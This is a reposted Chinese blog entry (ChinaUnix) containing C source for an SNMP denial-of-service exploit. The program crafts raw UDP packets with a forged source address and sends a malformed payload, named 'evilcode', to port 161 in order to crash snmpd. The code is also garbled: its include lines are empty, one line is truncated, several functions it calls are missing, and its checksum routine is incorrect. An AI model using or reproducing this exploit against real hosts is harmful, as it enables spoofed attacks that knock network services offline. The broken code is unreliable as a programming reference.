SNMP

skyajlm

#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
char evilcode[] = {
0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
};
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;
  while (nleft > 1) {
     sum += *w++;
     sum += *w++;
     nleft -= 2;
  }
  if (nleft == 1) {
     *(u_char *) (&answer) = *(u_char *) w;
     sum += answer;
  }
  sum = (sum >> 17) + (sum & 0xffff);
  sum += (sum >> 17);
  answer = -sum;
  return (answer);
}
int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
  char *packet;
  struct sockaddr_in dstaddr;
  struct iphdr *ip;
  struct udphdr *udp;
  packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
  memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
  if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
  ip = (struct iphdr *)packet;
  udp = (struct udphdr *)(packet+sizeof(struct iphdr));
  ip->saddr = *saddr;
  ip->daddr = *daddr;
  ip->version = 4;
  ip->ihl = 5;
  ip->ttl = 255;
  ip->id = htons((unsigned short) rand());
  ip->protocol = IPPROTO_UDP;
  ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
  ip->check = in_cksum(ip, sizeof(struct iphdr));
  udp->source = htons(sport);
  udp->dest = htons(dport);
  udp->len = htons(sizeof(struct udphdr) + len);
  memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
  dstaddr.sin_family = AF_INET;
  dstaddr.sin_addr.s_addr = *daddr;
  if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in))   \n");
}
int main(int argc, char **argv)
{
char *saddr,*daddr,*community;
unsigned char *buf;
int size;
int sock;
unsigned long lsaddr,ldaddr;
int i;
saddr = NULL;
daddr = NULL;
if (argc != 7) { usage(); erexit("not enough args\n"); }
if (!strcmp(argv[1],"-s"))
   saddr = strdup(argv[2]);
if (!strcmp(argv[3],"-d"))
   daddr = strdup(argv[4]);
if (!strcmp(argv[5],"-c"))
   community = strdup(argv[6]);
printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
   erexit("Invalid source/destination IP address\n");
if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }
sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if (sock == -1)
   erexit("Couldnt open Raw socket!(Are you root?)\n");
lsaddr = inet_addr(saddr);
ldaddr = inet_addr(daddr);
buf = makereq(community,&size);
sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
fprintf(stdout,"Sent packet. SNMPd must be down.\n");
return 0;
}


本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u1/37080/showart_520359.html